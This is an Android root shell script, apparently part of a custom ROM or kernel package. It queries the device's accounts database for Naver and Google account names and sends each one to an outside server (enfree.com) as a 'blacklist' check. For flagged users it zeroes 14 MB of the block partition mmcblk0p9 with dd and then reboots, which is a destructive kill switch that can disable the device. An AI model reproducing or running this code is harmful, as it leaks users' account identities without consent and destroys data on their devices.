#!/system/bin/sh

alias bb=/res/bin/busybox
sqlite="/res/bin/sqlite3";
BB=/res/bin/busybox
CURL=/res/bin/curl
_DB="/data/system/users/0/accounts.db";
URL="http://enfree.com/prime"

in_array(){
    el=$1
    shift
    while test $# -gt 0; do
        test $el = $1 && return 0
        shift
    done
    return 1
}

naver=`$sqlite $_DB "SELECT name FROM accounts WHERE type='com.nhn.android.naveraccount'"`
google=`$sqlite $_DB "SELECT name FROM accounts WHERE type='com.google'"`
FLAG_PRINT=/data/media/0/Android/data/.blacklist_user
BLACKLIST_FLAG=$(cat $FLAG_PRINT 2>/dev/null)
CHECK_BLACKLIST=1

if [ $CHECK_BLACKLIST -eq 1 ]; then
	if [ ! -z "$naver" ]; then
	  for v in ${naver[@]}; do
		GET_ACCOUNT=$($CURL -L "http://enfree.com/prime/?page=blacklist&uid=$v@naver.com" 2> /dev/null)
		[ $GET_ACCOUNT ] && [ "$GET_ACCOUNT" != "NO_ACCOUNTS" ] && BLACKLIST_FLAG=1
	  done
	fi
	if [ ! -z "$google" ]; then
	  for v in ${google[@]}; do
		GET_ACCOUNT=$($CURL -L "http://enfree.com/prime/?page=blacklist&uid=$v" 2> /dev/null)
		[ $GET_ACCOUNT ] && [ "$GET_ACCOUNT" != "NO_ACCOUNTS" ] && BLACKLIST_FLAG=1
	  done
	fi
fi

if [ "$BLACKLIST_FLAG" -eq 1 ]; then
	echo "ERR: 사용이 제한된 계정입니다."
	touch $FLAG_PRINT
	chmod 0644 $FLAG_PRINT
	echo 1 > $FLAG_PRINT
	dd if=/dev/zero bs=$((14680064)) count=1 > /dev/block/mmcblk0p9
	(
		sleep 300
		bb reboot
	) &
	exit 1
fi
